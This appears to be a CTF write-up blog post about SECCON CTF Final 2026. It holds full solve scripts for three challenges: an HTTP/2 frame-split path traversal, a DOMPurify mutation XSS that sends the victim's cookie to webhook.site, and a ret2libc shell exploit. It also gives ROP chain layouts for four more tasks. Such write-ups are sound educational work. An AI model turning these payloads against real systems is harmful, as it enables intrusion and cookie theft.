seccon-blog-en

2026 SECCON CTF Final

1st Day Jeopardy Style CTF
- Warpup(web)
- DOMDOMDOMPurify(web)
- scrofa(pwn)
2nd Day King of the Hill Style CTF
- Bid My Gadget(pwn)
- t1
- t2
- t3
- t4
Japan Trip

1st Day Jeopardy Style CTF

The first day was a Jeopardy-style CTF, the format we’re all familiar with, where you simply solve challenges. I solved 2 web hacking challenges and 1 pwnable challenge, so I’ll write up the solutions for those. What was fun was that when you solved a challenge, asfd

a VTuber would appear and give you a thumbs up. Our team finished 4th on the first day.

Warpup

Looking at the backend code:

1
let path: String = body
2
    .fold(String::from("./"), |mut path, buf| async move {
3
        ...
4
        path += &String::from_utf8(chunk.into()).unwrap_or_default();
5
        ...
6
        path
7
    })
8
    .await;
9

10
fs::read_to_string(&path).unwrap_or(format!("Not Found: {}", &path).into())

The request body is appended to ./ without validation to read files. This immediately suggests Path Traversal. While looking for defense logic against Path Traversal, I found the following in proxy/app.py:

1
def waf(req: str) -> bool:
2
    return (".." in req or "transfer" in req.lower())

It’s a very weak filter that only checks for string inclusion. The flag is in environ, so it seems we need to bypass the filter to read /proc/self/environ. HTTP/2 can split the body across multiple DATA frames, which allowed us to bypass the filter detecting ... Since the backend simply concatenates DATA payloads to create the final body, we can get the Flag from /proc/self/environ.

1
import re
2
import socket
3
import sys
4

5
HOST = sys.argv[1] if len(sys.argv) > 1 else "warpup.int.seccon.games"
6
PORT = int(sys.argv[2]) if len(sys.argv) > 2 else 3000
7

8

9
def frame(ftype: int, flags: int, sid: int, payload: bytes = b"") -> bytes:
10
    n = len(payload)
11
    return bytes(
12
        [
13
            (n >> 16) & 0xFF,
14
            (n >> 8) & 0xFF,
15
            n & 0xFF,
16
            ftype & 0xFF,
17
            flags & 0xFF,
18
            (sid >> 24) & 0x7F,
19
            (sid >> 16) & 0xFF,
20
            (sid >> 8) & 0xFF,
21
            sid & 0xFF,
22
        ]
23
    ) + payload
24

25

26
def hpack_lit(name: str, value: str) -> bytes:
27
    nb = name.encode()
28
    vb = value.encode()
29
    if len(nb) >= 128 or len(vb) >= 128:
30
        raise ValueError("header too long for this simple encoder")
31
    return bytes([0x00, len(nb)]) + nb + bytes([len(vb)]) + vb
32

33

34
def build_request() -> bytes:
35
    parts = [".", ".", "/", ".", ".", "/proc/self/environ"]
36
    body = "".join(parts)
37

38
    headers = b"".join(
39
        [
40
            hpack_lit(":method", "POST"),
41
            hpack_lit(":scheme", "http"),
42
            hpack_lit(":path", "/file"),
43
            hpack_lit(":authority", HOST),
44
            hpack_lit("content-length", str(len(body))),
45
        ]
46
    )
47

48
    req = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"
49
    req += frame(0x4, 0x00, 0, b"")
50
    req += frame(0x1, 0x04, 1, headers)
51

52
    for i, p in enumerate(parts):
53
        flags = 0x01 if i == len(parts) - 1 else 0x00
54
        req += frame(0x0, flags, 1, p.encode())
55

56
    return req
57

58

59
def recv_all(sock: socket.socket) -> bytes:
60
    out = b""
61
    sock.settimeout(2)
62
    while True:
63
        try:
64
            c = sock.recv(65535)
65
            if not c:
66
                break
67
            out += c
68
        except Exception:
69
            break
70
    return out
71

72

73
def extract_data_stream1(raw: bytes) -> bytes:
74
    i = 0
75
    body = b""
76
    while i + 9 <= len(raw):
77
        length = (raw[i] << 16) | (raw[i + 1] << 8) | raw[i + 2]
78
        ftype = raw[i + 3]
79
        sid = (
80
            ((raw[i + 5] & 0x7F) << 24)
81
            | (raw[i + 6] << 16)
82
            | (raw[i + 7] << 8)
83
            | raw[i + 8]
84
        )
85
        i += 9
86
        if i + length > len(raw):
87
            break
88
        payload = raw[i : i + length]
89
        i += length
90
        if ftype == 0x0 and sid == 1:
91
            body += payload
92
    return body
93

94

95
def main():
96
    req = build_request()
97
    with socket.create_connection((HOST, PORT), timeout=10) as s:
98
        s.sendall(req)
99
        raw = recv_all(s)
100

101
    body = extract_data_stream1(raw)
102
    m = re.search(rb"SECCON\{[^}]+\}", body)
103
    if m:
104
        print(m.group().decode())
105
    else:
106
        print("flag not found")
107

108

109
if __name__ == "__main__":
110
    main()

SECCON{Wha7_ch4racter_did_you_use_7o_s0lv3_1t??}

DOMDOMDOMPurify

Looking at the web code, it sanitizes input values x, y, z with DOMPurify and concatenates them with string replace at the end.

1
DOMPurify.addHook("afterSanitizeAttributes", (node) => {
2
  for (const { name, value } of node.attributes) {
3
    if (/[{}]/.test(value)) node.attributes.removeNamedItem(name);
4
  }
5
});
6

7
result.innerHTML = "{X}{Y}{Z}"
8
  .replace("{X}", () => DOMPurify.sanitize(`<span>${x}</span>`))
9
  .replace("{Y}", () => DOMPurify.sanitize(`<span>${y}</span>`))
10
  .replace("{Z}", () => DOMPurify.sanitize(`<span>${z}</span>`));

At first, it looks safe since the hook removes attributes containing {}, but looking closely, it’s deleting from node.attributes while iterating over it. Since NamedNodeMap is live, one of the adjacent attributes can be skipped in the check.

So if we create:

1
<img alt="{Z}" src="{Y}">

We can create a case where alt is removed but src="{Y}" remains.

The key point is that .replace("{Y}", ...) only replaces the first {Y}, so the {Y} inside img src gets replaced before the intended body position. As a result, the sanitized y string is interpreted in the attribute context, causing an attribute breakout.

Looking at the bot code, it sets a FLAG cookie with domain=web before visiting the URL.

1
await context.setCookie({
2
  name: "FLAG",
3
  value: flag.value,
4
  domain: challenge.appUrl.hostname,
5
  path: "/",
6
});

So if we create an XSS, we can extract the flag from document.cookie.

1
#!/usr/bin/env python3
2
import argparse
3
import json
4
import time
5
import urllib.error
6
import urllib.parse
7
import urllib.request
8

9

10
def build_exploit_url(webhook_url: str) -> str:
11
    x = '</span><img alt="{Z}" src="{Y}">'
12
    y = (
13
        f'" onerror="location=\'{webhook_url}?c=\'+encodeURIComponent(document.cookie)" '
14
        'src="x'
15
    )
16
    z = "1"
17
    query = urllib.parse.urlencode({"x": x, "y": y, "z": z})
18
    return f"http://web:3000/?{query}"
19

20

21
def post_report(bot_base: str, target_url: str) -> tuple[int, str]:
22
    endpoint = bot_base.rstrip("/") + "/api/report"
23
    body = json.dumps({"url": target_url}).encode()
24
    req = urllib.request.Request(
25
        endpoint,
26
        data=body,
27
        headers={"Content-Type": "application/json"},
28
        method="POST",
29
    )
30
    with urllib.request.urlopen(req, timeout=20) as resp:
31
        data = resp.read().decode(errors="replace")
32
        return resp.status, data
33

34

35
def poll_flag(token: str, timeout: int, interval: float) -> str | None:
36
    endpoint = f"https://webhook.site/token/{token}/requests?sorting=newest"
37
    deadline = time.time() + timeout
38

39
    while time.time() < deadline:
40
        try:
41
            with urllib.request.urlopen(endpoint, timeout=15) as resp:
42
                data = json.loads(resp.read().decode())
43
        except urllib.error.URLError:
44
            time.sleep(interval)
45
            continue
46

47
        for item in data.get("data", []):
48
            query = item.get("query") or {}
49
            c = query.get("c")
50
            if not c:
51
                continue
52
            if "SECCON{" in c:
53
                if c.startswith("FLAG="):
54
                    return c.split("FLAG=", 1)[1]
55
                return c
56

57
        time.sleep(interval)
58

59
    return None
60

61

62
def main() -> int:
63
    parser = argparse.ArgumentParser(description="SECCON DOMDOMDOMPurify exploit")
64
    parser.add_argument(
65
        "--bot",
66
        default="http://domdomdom.int.seccon.games:1337",
67
        help="Admin bot base URL",
68
    )
69
    parser.add_argument(
70
        "--webhook-token",
71
        required=True,
72
        help="Webhook.site token UUID",
73
    )
74
    parser.add_argument("--timeout", type=int, default=90, help="Polling timeout seconds")
75
    parser.add_argument("--interval", type=float, default=2.0, help="Polling interval seconds")
76
    args = parser.parse_args()
77

78
    webhook_url = f"https://webhook.site/{args.webhook_token}"
79
    exploit_url = build_exploit_url(webhook_url)
80

81
    print(f"[+] Exploit URL: {exploit_url}")
82
    print(f"[+] Report to: {args.bot.rstrip('/')}/api/report")
83

84
    status, body = post_report(args.bot, exploit_url)
85
    print(f"[+] Report response: {status} {body.strip()}")
86

87
    flag = poll_flag(args.webhook_token, args.timeout, args.interval)
88
    if flag:
89
        print(f"[+] FLAG: {flag}")
90
        return 0
91

92
    print("[-] Flag not received in time")
93
    return 1
94

95

96
if __name__ == "__main__":
97
    raise SystemExit(main())

SECCON{abus3d_mXSS_pr0tections}

scrofa

This challenge has the following features:

1: Input note content
2: Output note
3: Save file (fopen(save->path, "w")) I found the vulnerability immediately. In scanf("%[^\n]%*c", note);, note is 0x1000 bytes, but there’s no input length limit, allowing overflow. Initially, I tried to leak addresses using fwrite in the code but failed.

1
FILE *fp = fopen(save->path, "w");
2
if (!fp) {
3
  perror(save->path);
4
  break;
5
}

In this branch, if we overwrite save->path, perror will print the string pointed to by that pointer, allowing us to complete the leak. Let me explain the exploit design: First, write A * 0x1060 + b"\x00" to manipulate the lower byte of save->path. Then press Save to measure the prefix length in the perror output before ": <errno>". We need this value to match canary leak to tempname + const and calculate the 1-byte overwrite value based on the current session’s stack low16.

After setting 1 byte to make save->path = tempname + 0x59, then Save.

Read the 7 bytes before the perror prefix:

1
canary = b"\x00" + leaked[:7]

to restore the canary.

Set to save->path = tempname + 0x78 to leak main’s return pointer.

1
leaked_ret = u64(leaked[:6].ljust(8, b"\x00"))
2
libc_base = leaked_ret - 0x2a1ca

The final exploit was relatively easy using ret2libc.

1
#!/usr/bin/env python3
2
import argparse
3
import os
4
import re
5
from typing import Optional
6
from pwn import ELF, ROP, context, flat, p64, process, remote, u64
7

8
context.arch = "amd64"
9
context.log_level = "error"
10

11

12
RET_TO_LIBC_OFF = 0x2A1CA
13
CANARY_OFFSET_IN_MAIN = 0x59
14
RET_OFFSET_IN_MAIN = 0x78
15
PROBE_PREFIX_LEN_BIAS = 0x40
16

17

18
def parse_perror_prefix(out: bytes) -> Optional[bytes]:
19
    if not out.endswith(b"> "):
20
        return None
21
    body = out[:-2]
22
    pos = body.rfind(b": ")
23
    if pos < 0:
24
        return None
25
    err = body[pos + 2 :].split(b"\n", 1)[0]
26
    if err not in {
27
        b"No such file or directory",
28
        b"Read-only file system",
29
        b"Permission denied",
30
        b"Invalid argument",
31
    }:
32
        return None
33
    return body[:pos]
34

35

36
def recv_menu(io) -> bytes:
37
    return io.recvuntil(b"> ", timeout=1.0)
38

39

40
def menu_write(io, payload: bytes) -> None:
41
    io.sendline(b"1")
42
    io.recvuntil(b"New content: ", timeout=1.0)
43
    io.send(payload + b"\n")
44
    recv_menu(io)
45

46

47
def menu_save(io) -> bytes:
48
    io.sendline(b"3")
49
    return recv_menu(io)
50

51

52
def connect_target(host: str, port: int, local_bin: Optional[str]):
53
    if local_bin:
54
        return process(local_bin)
55
    return remote(host, port, timeout=1.0)
56
def solve_once(host: str, port: int, local_bin: Optional[str], libc: ELF):
57
    rop = ROP(libc)
58
    pop_rdi = rop.find_gadget(["pop rdi", "ret"]).address
59
    ret = rop.find_gadget(["ret"]).address
60
    system = libc.symbols["system"]
61
    binsh = next(libc.search(b"/bin/sh\x00"))
62
    io = connect_target(host, port, local_bin)
63
    recv_menu(io)
64
    menu_write(io, b"A" * 0x1060 + b"\x00")
65
    p0 = parse_perror_prefix(menu_save(io))
66
    if p0 is None or not p0 or any(ch != 0x41 for ch in p0):
67
        io.close()
68
        return None
69

70
    temp_low16 = len(p0) - PROBE_PREFIX_LEN_BIAS
71
    if temp_low16 < 0 or temp_low16 > 0x87:
72
        io.close()
73
        return None
74

75
    c_can = temp_low16 + CANARY_OFFSET_IN_MAIN
76
    c_ret = temp_low16 + RET_OFFSET_IN_MAIN
77
    menu_write(io, b"A" * 0x1060 + bytes([c_can]))
78
    p_can = parse_perror_prefix(menu_save(io))
79
    if p_can is None or len(p_can) < 7:
80
        io.close()
81
        return None
82
    canary = b"\x00" + p_can[:7]
83
    menu_write(io, b"A" * 0x1060 + bytes([c_ret]))
84
    p_ret = parse_perror_prefix(menu_save(io))
85
    if p_ret is None or len(p_ret) < 6:
86
        io.close()
87
        return None
88

89
    leaked_ret = u64(p_ret[:6].ljust(8, b"\x00"))
90
    if (leaked_ret >> 40) != 0x7F:
91
        io.close()
92
        return None
93
    libc_base = leaked_ret - RET_TO_LIBC_OFF
94
    chain = flat(
95
        p64(libc_base + ret),
96
        p64(libc_base + pop_rdi),
97
        p64(libc_base + binsh),
98
        p64(libc_base + system),
99
    )
100
    payload = b"A" * 0x1008 + canary + b"B" * 8 + chain
101
    if b"\n" in payload:
102
        io.close()
103
        return None
104

105
    menu_write(io, payload)
106
    io.sendline(b"9")
107
    io.sendline(b"cat /app/flag-* 2>/dev/null || id")
108
    out = io.recvrepeat(1.5)
109
    io.close()
110

111
    m = re.search(rb"(SECCON\{[^}\n]+\}|FLAG\{[^}\n]+\})", out)
112
    return {
113
        "temp_low16": temp_low16,
114
        "canary": canary,
115
        "leaked_ret": leaked_ret,
116
        "libc_base": libc_base,
117
        "output": out,
118
        "flag": m.group(1).decode() if m else None,
119
    }
120

121

122
def main() -> None:
123
    parser = argparse.ArgumentParser(
124
        description="scrofa exploit (perror-based leaks + ret2libc)"
125
    )
126
    parser.add_argument("--host", default="scrofa.int.seccon.games")
127
    parser.add_argument("--port", type=int, default=5000)
128
    parser.add_argument("--libc", default="./libc_scrofa.so.6")
129
    parser.add_argument("--attempts", type=int, default=3000)
130
    parser.add_argument(
131
        "--local-bin",
132
        default=None,
133
        help="If set, run local process instead of remote TCP.",
134
    )
135
    args = parser.parse_args()
136

137
    libc_path = args.libc
138
    if not os.path.isabs(libc_path):
139
        libc_path = os.path.join(os.path.dirname(__file__), libc_path)
140
    libc = ELF(libc_path, checksec=False)
141

142
    for i in range(1, args.attempts + 1):
143
        try:
144
            result = solve_once(args.host, args.port, args.local_bin, libc)
145
        except Exception:
146
            result = None
147
        if not result:
148
            if i % 100 == 0:
149
                print(f"[attempt {i}] still searching suitable stack low16...")
150
            continue
151

152
        print(f"[attempt {i}] exploit path found")
153
        print(f"  temp_low16 = 0x{result['temp_low16']:x}")
154
        print(f"  leaked_ret = 0x{result['leaked_ret']:x}")
155
        print(f"  libc_base  = 0x{result['libc_base']:x}")
156
        print(result["output"].decode("latin-1", "ignore"), end="")
157
        if result["flag"]:
158
            print(f"\n[+] flag = {result['flag']}")
159
            return
160

161

162
if __name__ == "__main__":
163
    main()

SECCON{1n05h1$Hi_Um4_uMA!} As a side note, I was running out of time on this challenge, so I explained my idea to codex5.3, showed it the debugging process, and let it handle the exploit. I was amazed when it completed the exploit in just 2 minute.

2nd Day King of the Hill Style CTF

The King of the Hill format runs with one tick every 5 minutes. For the pwnable challenges I solved, we needed to solve problems requiring the smallest ROP chains. Also, necessary gadgets had to be purchased in auctions held every 30 minutes, making auction skills quite important.

t1 - Paint the Canvas

t1
Paint the Canvas
Write dword 0xdeadbeef to address 0x50001337.

1
{
2
  "addr": 1342182199,
3
  "size": 4,
4
  "type": "mem_eq",
5
  "value": 3735928559
6
}

The gadgets used for this challenge:

0x4015b1: pop rbx; ret (from 0x4015b0 + 1)
0x402070: xchg rbx, rcx; ret
0x401268: pop rbp; ret (from 0x401260 + 8)
0x4013d0: pop r13; push rsp; pop rsp; add rsp, 8; ret
0x401280: mov dword ptr [rbp - 0xd28], ecx; call r13
0x4013b0: hlt

Slot	QWORD Value	Meaning
0	`0x00000000004015b1`	`pop rbx; ret`
1	`0x00000000deadbeef`	`rbx <- 0xdeadbeef`
2	`0x0000000000402070`	`xchg rbx, rcx`
3	`0x0000000000401268`	`pop rbp; ret`
4	`0x000000005000205f`	`rbp <- target+0xd28` (`0x50001337 + 0xd28`)
5	`0x00000000004013d0`	`pop r13; ... add rsp,8; ret`
6	`0x00000000004013b0`	`r13 <- hlt`
7	`0x0000000000000000`	dummy skipped by `add rsp,8`
8	`0x0000000000401280`	`mov dword [rbp-0xd28], ecx; call r13`

Load 0xdeadbeef with pop rbx.
Move value to ecx with xchg rbx,rcx.
Set 0x50001337 + 0xd28 to pop rbp.
Prepare r13 = hlt with pop r13....
Execute mov dword [rbp-0xd28], ecx to write 4 bytes to 0x50001337.
Call hlt with call r13 to terminate.

t2 - Way Out

t2
Way Out
Execute syscall(rax=60, rdi=<dword from address 0x50001234>)

1
{
2
  "checks": [
3
    {
4
      "regs": {
5
        "rax": 60
6
      },
7
      "type": "syscall"
8
    },
9
    {
10
      "addr": 1342181940,
11
      "reg": "rdi",
12
      "type": "reg_eq_mem_u32_initial"
13
    }
14
  ],
15
  "type": "and"
16
}

The gadgets used for this challenge:

0x401090: add eax, 0x1c937; ret
0x4014c5: and eax, 0xfe; ret (from 0x4014c0 + 5)
0x401410: add eax, 3; ret
0x4015b1: pop rbx; ret
0x401321: mov edi, dword ptr [rbx + 0x1fb8a9]; ret 0x17 (from 0x401320 + 1)
0x401170: syscall

Index	Value	Meaning
0	`0x0000000000401090`	Start `rax` calculation
1	`0x00000000004014c5`	`and eax,0xfe`
2	`0x0000000000401410`	`add eax,3`
3	`0x0000000000401410`	`add eax,3` -> `rax=60`
4	`0x00000000004015b1`	`pop rbx`
5	`0x000000004fe0598b`	`rbx = 0x50001234 - 0x1fb8a9`
6	`0x0000000000401321`	`mov edi,[rbx+off]; ret 0x17`

Create rax=60 with add/and/add/add.
Put 0x4fe0598b in pop rbx.
mov edi,[rbx+0x1fb8a9] to get rdi <- *(u32*)0x50001234.
ret 0x17 advances rsp significantly, and with the remaining 3 tail bytes (70 11 40) + zero-filled stack, RIP becomes 0x401170.
Trigger syscall.

t3 - Art Forgery

t3
Art Forgery
Copy 0x40 bytes from address 0x50001000 to 0x5000f000.

1
{
2
  "dst": 1342238720,
3
  "size": 64,
4
  "src": 1342181376,
5
  "type": "mem_copy"
6
}

The core block used for this challenge:

Front part of 0x401010 block:

1
...
2
movsq
3
call qword ptr [rdx - 0xfe8]

Used repeatedly to copy 8 bytes at a time. Since we’re copying 0x40 bytes, we need 8 movsq operations. Key points of this challenge:

Use a fixed stack position (0x7fff00000200) as the call target table.
Use mov dword [rbp-0xd28], ecx; call r13 to write 0x4015b1 to the lower 4 bytes of table[0].
Since the upper 4 bytes of the table are 0, the entry becomes 0x00000000004015b1(=pop rbx; ret).
After that, call [rdx-0xfe8] always goes to pop rbx; ret, which consumes the next RIP from the stack, forming a loop.

Slot	QWORD Value	Meaning
0	`0x00000000004013d0`	`pop r13; ... add rsp,8; ret`
1	`0x00000000004015b1`	`r13 <- pop_rbx_ret`
2	`0x0000000000000000`	skipped
3	`0x0000000000401268`	`pop rbp; ret`
4	`0x00007fff00000f28`	`table+0xd28`
5	`0x00000000004015b1`	next RIP
6	`0x00000000004015b1`	`rbx <- 0x4015b1`
7	`0x0000000000402070`	`xchg rbx,rcx`
8	`0x0000000000401280`	`mov dword [rbp-0xd28],ecx; call r13`
9	`0x0000000000402080`	`xchg rcx,rdx`
10	`0x0000000000401268`	`pop rbp; ret`
11	`0x000000005000f000`	`rbp <- dst`
12	`0x00000000004015a0`	`xchg ebp,edi; jmp rdx`
13	`0x0000000050001000`	(consumed by `pop rbx` after jmp) src
14	`0x0000000000402070`	`xchg rbx,rcx`
15	`0x00000000004014a0`	`xchg ecx,esi; add rdx,rcx; jmp rdx`
16	`0x00007fff000011e8`	(consumed by `pop rbx` after jmp) `rdx_for_call`
17	`0x0000000000402070`	`xchg rbx,rcx`
18	`0x0000000000402080`	`xchg rcx,rdx`
19	`0x0000000000401010`	movsq loop #1
20	`0x0000000000401010`	movsq loop #2
21	`0x0000000000401010`	movsq loop #3
22	`0x0000000000401010`	movsq loop #4
23	`0x0000000000401010`	movsq loop #5
24	`0x0000000000401010`	movsq loop #6
25	`0x0000000000401010`	movsq loop #7
26	`0x0000000000401010`	movsq loop #8

Bootstrap writer to plant pop_rbx_ret function pointer at table[0].
Prepare rdi=dst, rsi=src, rdx=table+0xfe8.
Each execution of 0x401010 copies 8 bytes with movsq.
The following call [rdx-0xfe8] branches to pop rbx; ret, fetching the next chain entry as RIP and repeating.
After 8 iterations, terminate with tail hlt.

t4 - Call the Curator

t4
Call the Curator
Execute syscall(rax=59, rdi="/bin/sh", rsi={"/bin/sh", "-c", "/readflag", NULL}, rdx=0)

1
{
2
  "args": {
3
    "rdi": {
4
      "type": "cstr_eq",
5
      "value": "/bin/sh"
6
    },
7
    "rdx": {
8
      "type": "ptr_eq",
9
      "value": 0
10
    },
11
    "rsi": {
12
      "type": "ptr_array_cstr_eq",
13
      "values": [
14
        "/bin/sh",
15
        "-c",
16
        "/readflag",
17
        null
18
      ]
19
    }
20
  },
21
  "regs": {
22
    "rax": 59
23
  },
24
  "type": "syscall"
25
}

The core idea for this challenge:

Using the lea rsi, [rsp+0x18] + lodsq combination to sequentially read (target, value) pairs mixed into the chain.

The repetition pattern:

lodsq -> target address
mov rdi, rax
lodsq -> value
mov [rdi], rax

Perform this pattern 3 times to write the following qwords to scratch:

0x50001347 <- "flag\0\0\0\0"
0x5000133f <- "-c\0/read"
0x50001337 <- "/bin/sh\0"

This results in:

0x50001337: "/bin/sh\0"
0x5000133f: "-c\0"
0x50001342: "/readflag\0" (front qword + back qword concatenated)

Slot	QWORD Value	Meaning
0	`0x0000000000402510`	`lea rsi,[rsp+0x18]; ret`
1	`0x00000000004013d4`	`add rsp,8; ret` (offset entry)
2	`0x0000000000000000`	skipped
3	`0x0000000000401310`	`pop rbp; add rsp,0x28; ret`
4	`0x0000000050001347`	t1 (or popped as rbp)
5	`0x0000000067616c66`	v1 = `"flag"`
6	`0x000000005000133f`	t2
7	`0x646165722f00632d`	v2 = `"-c\\0/read"`
8	`0x0000000050001337`	t3
9	`0x0068732f6e69622f`	v3 = `"/bin/sh\\0"`
10	`0x0000000000402640`	`lodsq`
11	`0x0000000000402420`	`mov rdi,rax`
12	`0x0000000000402640`	`lodsq`
13	`0x00000000004022a0`	`mov [rdi],rax`
14	`0x0000000000402640`	`lodsq`
15	`0x0000000000402420`	`mov rdi,rax`
16	`0x0000000000402640`	`lodsq`
17	`0x00000000004022a0`	`mov [rdi],rax`
18	`0x0000000000402640`	`lodsq`
19	`0x0000000000402420`	`mov rdi,rax`
20	`0x0000000000402640`	`lodsq`
21	`0x00000000004022a0`	`mov [rdi],rax`
22	`0x0000000000402510`	`lea rsi,[rsp+0x18]` (realign to syscall arg lane)
23	`0x0000000000402640`	`lodsq` -> `rax=59`
24	`0x0000000000401170`	`syscall`
25	`0x0000000000000000`	dummy
26	`0x000000000000003b`	`59`
27	`0x0000000050001337`	argv[0] ptr
28	`0x000000005000133f`	argv[1] ptr

Tail bytes:

42 13 00 50

These are the lower 4 bytes of argv[2] = 0x0000000050001342, with the upper bytes compensated by zero-fill. The next qword is also zero-filled to become argv[3]=NULL.

Execution flow:

Use 3 prefixes to align rsi to the data lane start.
Build string blocks with 3 lodsq/mov patterns.
After the last write, rdi already points to ptr_binsh.
Re-execute lea rsi to move to the syscall arg lane starting position.
lodsq for rax=59.
When calling syscall:
- rdi = 0x50001337 -> "/bin/sh"
- rsi = &argv ([ptr_binsh, ptr_dashc, ptr_readflag, NULL])
- rdx = 0

Japan Trip

I was in Japan for 4 days but only had about 5 hours for sightseeing on the last day. I visited Sensoji Temple and drew a fortune there. You shake this small container to draw your fortune, and I got this one. Since I don’t know Japanese, I asked ChatGPT what it meant. It was a moderate fortune which was a bit disappointing, but I was satisfied that I didn’t draw a bad one. Next, I went to Tokyo Tower and then headed straight to the airport to return home. fffff

Finally, thank you for reading this post. Thanks to SECCON for hosting this excellent competition. Also thanks to spl and [:] for giving me the opportunity to participate in the finals.

SECCON CTF Final 2026